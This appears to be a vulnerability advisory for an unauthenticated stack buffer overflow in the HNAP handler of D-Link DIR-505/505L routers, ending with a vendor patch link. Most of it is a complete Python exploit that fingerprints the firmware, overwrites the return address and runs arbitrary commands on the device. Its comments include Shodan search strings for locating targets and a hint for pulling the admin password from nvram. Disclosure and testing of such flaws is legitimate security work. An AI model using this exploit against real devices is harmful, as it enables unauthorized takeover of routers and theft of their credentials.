Release date:
Updated on:
Affected Systems:
D-Link DIR-505
D-Link DIR-505L
Description:
--------------------------------------------------------------------------------
Bugtraq id: 67651
D-Link designs and develops wireless networking and Ethernet hardware products.
The DIR-505 and DIR-505L wireless routers contain a stack-based buffer overflow. The do_hnap() function in /www/my_cgi.cgi copies as many bytes of the request body as the HTTP "Content-Length" header specifies into a fixed-size stack buffer without a bounds check. A remote attacker can trigger the overflow, without authenticating, with a specially crafted SOAP "GetDeviceSettings" HNAP request, corrupt the stack and potentially execute arbitrary commands on the device.
<* Source: Craig Heffner
Link: http://secunia.com/advisories/58972/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following test procedure is offensive in nature and is intended only for security research and teaching. Users run it at their own risk.
Craig Heffner provides the following test method:
========================================================== ==============
#!/usr/bin/env python
# Unauthenticated stack overflow exploit that affects multiple D-Link products:
#
#   o D-Link DSP-W215 hardware v1, firmware v1.00
#   o D-Link DIR-505L hardware v1/2, firmware v1.06/1.07
#
# Shodan Dorks:
#
#   o lighttpd/1.4.28-devel-4618M
#   o lighttpd/1.4.28-devel-2866M
#
# The my_cgi.cgi CGI page responsible for handling HNAP requests reads
# Content-Length bytes into a fixed-size stack buffer.
#
# This exploit returns to .text to execute system() with a user-supplied
# command string (hint: try 'nvram get admin_user_pwd'). Output from the
# command will be returned to the user.
#
# Craig Heffner
# 2014-05-09
import sys

try:
    import urllib2
except ImportError:  # Python 3: urllib.request exposes Request, urlopen and HTTPError
    import urllib.request as urllib2
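class Device(object):
    """Fingerprint strings and exploit constants for one vulnerable firmware build.

    Each instance pairs the values that identify a target in its HNAP1 device
    description (model name, firmware version) with the two numbers the
    overflow needs for that exact build: how many bytes fill the stack buffer
    up to the saved registers, and the address written over the saved $ra.
    Both are build-specific, so a target must be fingerprinted before a
    payload is sent; the wrong pair will most likely just crash the CGI.
    """

    def __init__(self, model, version, size, ra):
        self.model = model        # text of <ModelName> in the HNAP1 response
        self.version = version    # text of <FirmwareVersion> in the HNAP1 response
        self.size = size          # filler bytes needed to reach the saved registers
        self.ra = ra              # 4-byte value written over the saved $ra (big-endian MIPS as given)
        self.model_html = "<ModelName>%s" % self.model
        self.version_html = "<FirmwareVersion>%s" % self.version

    def match(self, html):
        """Return True when *html* names both this model and this firmware version.

        *html* is the body of a GET /HNAP1/ response; a bytes body is decoded
        as latin-1 so the substring test works on either Python version.
        """
        if isinstance(html, bytes):
            html = html.decode("latin-1")
        return self.model_html in html and self.version_html in html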
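class Vulnerability(object):
    """Fingerprint a target over HNAP and fire the my_cgi.cgi stack overflow.

    my_cgi.cgi reads Content-Length bytes of the POST body into a fixed-size
    stack buffer, so the request body itself is the payload: filler up to the
    saved registers, a return address into .text that reaches system(), and
    the command string that call consumes. Whatever the command prints comes
    back in the HTTP response. No credentials are involved at any step, so
    any client that can reach /HNAP1/ can run commands on the device.
    """

    DEFAULT_COMMAND = 'nvram show'

    # One entry per firmware build. The return address differs per build,
    # which is why exploit() refuses to fire without a fingerprint match.
    VULNERABLE_DEVICES = [
        Device("DIR-505", "1.06", 30000, "\x00\x40\x52\x34"),
        Device("DIR-505", "1.07", 30000, "\x00\x40\x5C\x5C"),
        Device("DSP-W215", "1.00", 1000000, "\x00\x40\x5C\xAC"),
    ]

    def __init__(self, target, verbose=True, timeout=30):
        """Prepare the HNAP1 URL for *target* (host, host:port or full URL).

        *timeout* (seconds) bounds each HTTP request so a device that hangs
        after the overflow does not block the caller indefinitely.
        """
        self.verbose = verbose
        self.target = target
        self.timeout = timeout
        self.url = "%s/HNAP1/" % self.target
        if '://' not in self.url:
            self.url = 'http://' + self.url
        self._debug_message("Exploit URL: %s" % self.url)

    def _debug_message(self, msg):
        if self.verbose:
            print("[+] %s" % msg)

    def _debug_error(self, err):
        if self.verbose:
            print("[-] %s" % err)

    def _build_exploit(self, device, command):
        """Build the POST body that overwrites the saved $ra and hands *command* to system().

        Returns bytes so the body is sent verbatim on both Python 2 and 3.
        Raises ValueError if *command* contains a NUL, which would truncate
        the string before system() sees the rest of it.
        """
        ra = device.ra if isinstance(device.ra, bytes) else device.ra.encode("latin-1")
        if not isinstance(command, bytes):
            command = command.encode("latin-1")
        if b"\x00" in command:
            raise ValueError("command must not contain a NUL byte")
        parts = [
            b"D" * device.size,   # fill the stack buffer up to the saved registers
            b"B" * 4 * 5,         # saved $s0..$s4 (original marks these "don't care")
            ra,                   # saved $ra -> .text address that reaches system()
            b"C" * 0x28,          # stack filler between the return and the argument
            command,              # the string system() executes
            b"\x00",              # system() needs a NUL-terminated string
        ]
        return b"".join(parts)

    def _request(self, data=None):
        """GET (data is None) or POST *data* to the HNAP1 URL and return the body as text.

        An HTTP 500 is reported rather than raised: a crashed CGI is the
        expected result of a payload built for the wrong firmware, and the
        original author's message implies a 500 can also follow a command
        that simply printed nothing. Any other HTTPError is logged and an
        empty string is returned.
        """
        req = urllib2.Request(self.url, data)
        try:
            raw = urllib2.urlopen(req, timeout=self.timeout).read()
        except urllib2.HTTPError as e:
            raw = b""
            if e.code == 500:
                self._debug_message("CGI page crashed with no output (this may or may not be a good thing)!")
            else:
                self._debug_error("Unexpected response: %s" % (str(e)))
        return raw.decode("latin-1") if isinstance(raw, bytes) else raw

    def fingerprint(self):
        """GET the HNAP1 device description and match it against VULNERABLE_DEVICES.

        Returns the matching Device, or None when the target is not a known
        model/firmware pair -- in which case no payload is ever sent.
        """
        hnap_info = self._request()
        for device in self.VULNERABLE_DEVICES:
            if device.match(hnap_info):
                self._debug_message("Identified target as %s v%s" % (device.model, device.version))
                return device
        self._debug_error("Could not identify target!")
        return None

    def execute(self, device, command=DEFAULT_COMMAND):
        """Send the payload for *device* and return the command's output (text)."""
        self._debug_message("Executing exploit [%s] against %s [%s v%s]" % (command, self.target, device.model, device.version))
        return self._request(self._build_exploit(device, command))

    def exploit(self, command=DEFAULT_COMMAND):
        """Fingerprint, then execute *command*; return its output, or "" if the target is unknown."""
        device = self.fingerprint()
        if device:
            return self.execute(device, command)
        return ""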
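if __name__ == "__main__":
    # Usage: <target ip> <command>; the command runs on the device with the
    # CGI's privileges and its output is printed here.
    if len(sys.argv) != 3:
        print("Usage: %s <target ip> <command to execute>" % sys.argv[0])
        sys.exit(1)

    target = sys.argv[1]
    command = sys.argv[2]

    # exploit() fingerprints first; the return address is firmware-specific
    # and a mismatch crashes the CGI instead of running the command.
    print("\n" + Vulnerability(target).exploit(command))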
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
D-Link
------
The vendor has released a patch for this issue. Download it from the vendor's advisory page:
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029
This article permanently updates the link address: